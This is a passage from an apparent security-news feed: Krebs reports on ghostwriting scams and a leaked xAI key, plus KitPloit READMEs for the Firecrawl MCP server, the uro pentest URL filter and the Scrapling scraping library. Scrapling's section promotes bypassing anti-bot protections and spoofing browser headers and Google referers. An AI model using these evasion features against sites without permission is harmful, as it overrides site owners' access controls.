California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

☐ ☆ ✇ KitPloit - PenTest Tools!

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown — May 6th 2025 at 12:30


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor 🖥️

Note: Requires Cursor version 0.45.6+

For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
     • Name: "firecrawl-mcp" (or your preferred name)
     • Type: "command"
     • Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code:

{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY"
      }
    }
  }
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
    • Required when using cloud API (default)
    • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
    • Example: https://firecrawl.your-domain.com
    • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration

  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)

Credit Usage Monitoring

  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

        "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
        "FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
        "FIRECRAWL_RETRY_MAX_DELAY": "30000",
        "FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

        "FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
        "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
      }
    }
  }
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
  retry: {
    maxAttempts: 3,     // Number of retry attempts for rate-limited requests
    initialDelay: 1000, // Initial delay before first retry (in milliseconds)
    maxDelay: 10000,    // Maximum delay between retries (in milliseconds)
    backoffFactor: 2,   // Multiplier for exponential backoff
  },
  credit: {
    warningThreshold: 1000, // Warn when credit usage reaches this level
    criticalThreshold: 100, // Critical alert when credit usage reaches this level
  },
};

These configurations control:

  1. Retry Behavior
     • Automatically retries failed requests due to rate limits
     • Uses exponential backoff to avoid overwhelming the API
     • Example: With default settings, retries will be attempted at:
       • 1st retry: 1 second delay
       • 2nd retry: 2 seconds delay
       • 3rd retry: 4 seconds delay (capped at maxDelay)

  2. Credit Usage Monitoring
     • Tracks API credit consumption for cloud API usage
     • Provides warnings at specified thresholds
     • Helps prevent unexpected service interruption
     • Example: With default settings:
       • Warning at 1000 credits remaining
       • Critical alert at 100 credits remaining
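
To make the retry schedule concrete, here is a minimal Python sketch of the delay calculation described above. It only illustrates the exponential backoff formula (the helper name is made up); it is not firecrawl-mcp's actual code:

# Hypothetical helper illustrating the retry schedule above; not part of firecrawl-mcp.
def retry_delay_ms(attempt, initial_delay=1000, backoff_factor=2, max_delay=10000):
    # attempt is 1-based: the 1st retry waits initial_delay,
    # each later retry multiplies the wait by backoff_factor, capped at max_delay.
    return min(initial_delay * backoff_factor ** (attempt - 1), max_delay)

for attempt in (1, 2, 3):
    print(f"retry {attempt}: {retry_delay_ms(attempt)} ms")  # 1000, 2000, 4000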

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
  "name": "firecrawl_scrape",
  "arguments": {
    "url": "https://example.com",
    "formats": ["markdown"],
    "onlyMainContent": true,
    "waitFor": 1000,
    "timeout": 30000,
    "mobile": false,
    "includeTags": ["article", "main"],
    "excludeTags": ["nav", "footer"],
    "skipTlsVerification": false
  }
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
  "name": "firecrawl_batch_scrape",
  "arguments": {
    "urls": ["https://example1.com", "https://example2.com"],
    "options": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

Response includes operation ID for status checking:

{
  "content": [
    {
      "type": "text",
      "text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
    }
  ],
  "isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
  "name": "firecrawl_check_batch_status",
  "arguments": {
    "id": "batch_1"
  }
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
  "name": "firecrawl_search",
  "arguments": {
    "query": "your search query",
    "limit": 5,
    "lang": "en",
    "country": "us",
    "scrapeOptions": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
  "name": "firecrawl_crawl",
  "arguments": {
    "url": "https://example.com",
    "maxDepth": 2,
    "limit": 100,
    "allowExternalLinks": false,
    "deduplicateSimilarURLs": true
  }
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
  "name": "firecrawl_extract",
  "arguments": {
    "urls": ["https://example.com/page1", "https://example.com/page2"],
    "prompt": "Extract product information including name, price, and description",
    "systemPrompt": "You are a helpful assistant that extracts product information",
    "schema": {
      "type": "object",
      "properties": {
        "name": { "type": "string" },
        "price": { "type": "number" },
        "description": { "type": "string" }
      },
      "required": ["name", "price"]
    },
    "allowExternalLinks": false,
    "enableWebSearch": false,
    "includeSubdomains": false
  }
}

Example response:

{
  "content": [
    {
      "type": "text",
      "text": {
        "name": "Example Product",
        "price": 99.99,
        "description": "This is an example product description"
      }
    }
  ],
  "isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
  "name": "firecrawl_deep_research",
  "arguments": {
    "query": "how does carbon capture technology work?",
    "maxDepth": 3,
    "timeLimit": 120,
    "maxUrls": 50
  }
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
  "name": "firecrawl_generate_llmstxt",
  "arguments": {
    "url": "https://example.com",
    "maxUrls": 20,
    "showFullText": true
  }
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
  "content": [
    {
      "type": "text",
      "text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
    }
  ],
  "isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



☐ ☆ ✇ Security – Cisco Blog

Black Hat Asia 2025 NOC: Innovation in SOC

By: Jessica (Bair) Oppenheimer — April 24th 2025 at 12:00
Cisco is the Security Cloud Provider to the Black Hat conferences. Learn about the latest innovations for the SOC of the Future.
☐ ☆ ✇ Krebs on Security

xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

By: BrianKrebs — May 2nd 2025 at 00:52

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could use it for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

☐ ☆ ✇ KitPloit - PenTest Tools!

Uro - Declutters Url Lists For Crawling/Pentesting

By: Unknown — May 2nd 2025 at 00:30


Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any http requests to the URLs and removes:

  • incremental urls e.g. /page/1/ and /page/2/
  • blog posts and similar human written content e.g. /posts/a-brief-history-of-time
  • urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2
  • images, js, css and other "useless" files
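
To illustrate the third rule above, here is a rough Python sketch of how URLs that differ only in parameter values can be collapsed. The helper name is hypothetical and this is not uro's actual implementation, just the idea behind it:

from urllib.parse import parse_qsl, urlsplit

def url_signature(url):
    # Treat two URLs as duplicates if they share scheme, host, path,
    # and the same set of parameter names (parameter values are ignored).
    parts = urlsplit(url)
    param_names = tuple(sorted(k for k, _ in parse_qsl(parts.query)))
    return (parts.scheme, parts.netloc, parts.path, param_names)

seen, unique = set(), []
for url in ("http://example.com/page.php?id=1", "http://example.com/page.php?id=2"):
    sig = url_signature(url)
    if sig not in seen:
        seen.add(sig)
        unique.append(url)

print(unique)  # only the id=1 variant survives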


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filters hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through the blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filters hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are known to be vulnerable. More info.

Example: uro --filters hasext hasparams
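
For intuition, here is a small Python sketch of what the hasparams and hasext checks boil down to. The helper names are hypothetical; this is not uro's actual code:

from os.path import basename
from urllib.parse import urlsplit

def has_params(url):
    # hasparams: the URL carries a query string, e.g. /page.php?id=
    return bool(urlsplit(url).query)

def has_ext(url):
    # hasext: the last path segment has an extension, e.g. /page.php but not /books/1
    return "." in basename(urlsplit(url).path)

print(has_params("http://example.com/page.php?id="))  # True
print(has_ext("http://example.com/books/1"))          # False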



☐ ☆ ✇ Security – Cisco Blog

Instant Attack Verification: Verification to Trust Automated Response

By: Briana Farro — April 29th 2025 at 12:00
Discover how Cisco XDR’s Instant Attack Verification brings real-time threat validation for faster, smarter SOC response.
☐ ☆ ✇ KitPloit - PenTest Tools!

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown — April 28th 2025 at 12:30


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • 🔄 Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • 🔍 Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • 🚀 Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • 🔋 Memory Efficient: Optimized data structures for minimal memory footprint.
  • Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • 🛠️ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that take less memory than standard dictionaries, with added methods.
  • 📝 Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • 🔌 Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • 📘 Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

| # | Library | Time (ms) | vs Scrapling |
|:---:|---|---:|---:|
| 1 | Scrapling | 5.44 | 1.0x |
| 2 | Parsel/Scrapy | 5.53 | 1.017x |
| 3 | Raw Lxml | 6.76 | 1.243x |
| 4 | PyQuery | 21.96 | 4.037x |
| 5 | Selectolax | 67.12 | 12.338x |
| 6 | BS4 with Lxml | 1307.03 | 240.263x |
| 7 | MechanicalSoup | 1322.64 | 243.132x |
| 8 | BS4 with html5lib | 3373.75 | 620.175x |

As you can see, Scrapling is on par with Scrapy and slightly faster than Lxml, which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml, but Scrapling is still 4 times faster.

Extraction By Text Speed Test

| Library | Time (ms) | vs Scrapling |
|---|---:|---:|
| Scrapling | 2.51 | 1.0x |
| AutoScraper | 11.41 | 4.546x |

Scrapling can find elements with more methods, and it returns full element Adaptor objects, not just the text like AutoScraper. So, to make this test fair, both libraries extract an element by its text, find similar elements, and then extract the text content of all of them. As you can see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; starting from version 0.2.9, it requires at least Python 3.9.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries, with added features, that make requests or fetch pages for you in a single-request fashion and then return an Adaptor object. This feature was introduced because, previously, the only option was to fetch the page however you wanted and then pass it manually to the Adaptor class to create an Adaptor instance before you could start playing around with the page.

Features

You might be slightly confused by now, so let me clear things up. All fetcher-type classes are imported in the same way:

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
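
For example, assuming a reachable URL, those added attributes can be read directly off the returned object. A minimal sketch:

from scrapling.defaults import Fetcher

page = Fetcher.get('https://example.com')
print(page.status, page.reason)  # e.g. 200 OK
print(page.cookies)              # always a plain dictionary
print(page.request_headers)      # the headers that were sent with the request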

[!NOTE] The auto_match argument is enabled by default; it is the one you should care about the most, as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers and then set a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods; this will make httpx retry requests that fail for any reason. The default number of retries for all Fetcher methods is 3.

Note: all headers generated by the stealthy_headers argument can be overwritten through the headers argument.

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format: http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For async requests, you just replace the import, like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
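In a script (rather than a REPL), you would drive these coroutines with asyncio as usual; a minimal sketch, assuming nothing beyond the imports shown:

import asyncio
from scrapling.fetchers import AsyncFetcher

async def main():
    # Fire two requests concurrently instead of one after the other
    pages = await asyncio.gather(
        AsyncFetcher().get('https://httpbin.org/get'),
        AsyncFetcher().get('https://httpbin.org/headers'),
    )
    for page in pages:
        print(page.status)

asyncio.run(main())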

StealthyFetcher

